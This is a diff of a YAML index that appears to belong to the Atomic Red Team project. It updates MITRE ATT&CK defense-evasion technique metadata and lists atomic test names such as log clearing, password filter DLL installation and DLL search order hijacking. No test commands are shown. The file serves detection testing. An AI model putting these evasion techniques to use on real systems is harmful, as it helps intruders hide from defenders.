@@ -3859,8 +3933,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -3870,9 +3944,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests:
     - name: Execute a process from a directory masquerading as the current parent
@@ -3954,7 +4027,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -3978,8 +4051,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -4043,11 +4114,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -4068,8 +4138,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -4113,7 +4183,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests:
     - name: Extract binary files via VBA
@@ -4250,7 +4319,7 @@ defense-evasion:
         elevation_required: false
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -4270,9 +4339,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -4292,9 +4366,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -4311,6 +4384,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -4344,7 +4421,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests:
     - name: Add Federation to Azure AD
@@ -4490,7 +4566,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -4518,8 +4594,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests:
     - name: Safe Mode Boot
@@ -4573,7 +4647,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -4597,12 +4671,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -4692,13 +4764,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Linux)
@@ -4801,7 +4872,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -4826,8 +4897,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests:
     - name: rm -rf
@@ -5353,7 +5422,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -5379,8 +5448,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests:
     - name: CheckIfInstallable method call
@@ -5989,18 +6056,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -6016,8 +6082,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -6031,7 +6097,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -6057,6 +6123,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -6084,7 +6154,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -6153,7 +6222,7 @@ defense-evasion:
         elevation_required: true
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -6249,7 +6318,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests:
     - name: Gatekeeper Bypass
@@ -6334,7 +6402,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -6399,11 +6466,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -6464,7 +6530,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests:
     - name: Take ownership using takeown utility
@@ -6624,7 +6689,7 @@ defense-evasion:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -6650,7 +6715,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -6692,7 +6757,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -6734,7 +6798,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -6757,7 +6821,6 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests:
     - name: Msiexec.exe - Execute Local MSI file with embedded JScript
@@ -7162,31 +7225,7 @@ defense-evasion:
         name: command_prompt
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -7210,22 +7249,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -7393,7 +7454,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -7419,7 +7479,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -7442,8 +7502,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -7539,7 +7597,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests:
     - name: Clear Bash history (rm)
@@ -7764,60 +7821,71 @@ defense-evasion:
         name: powershell
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
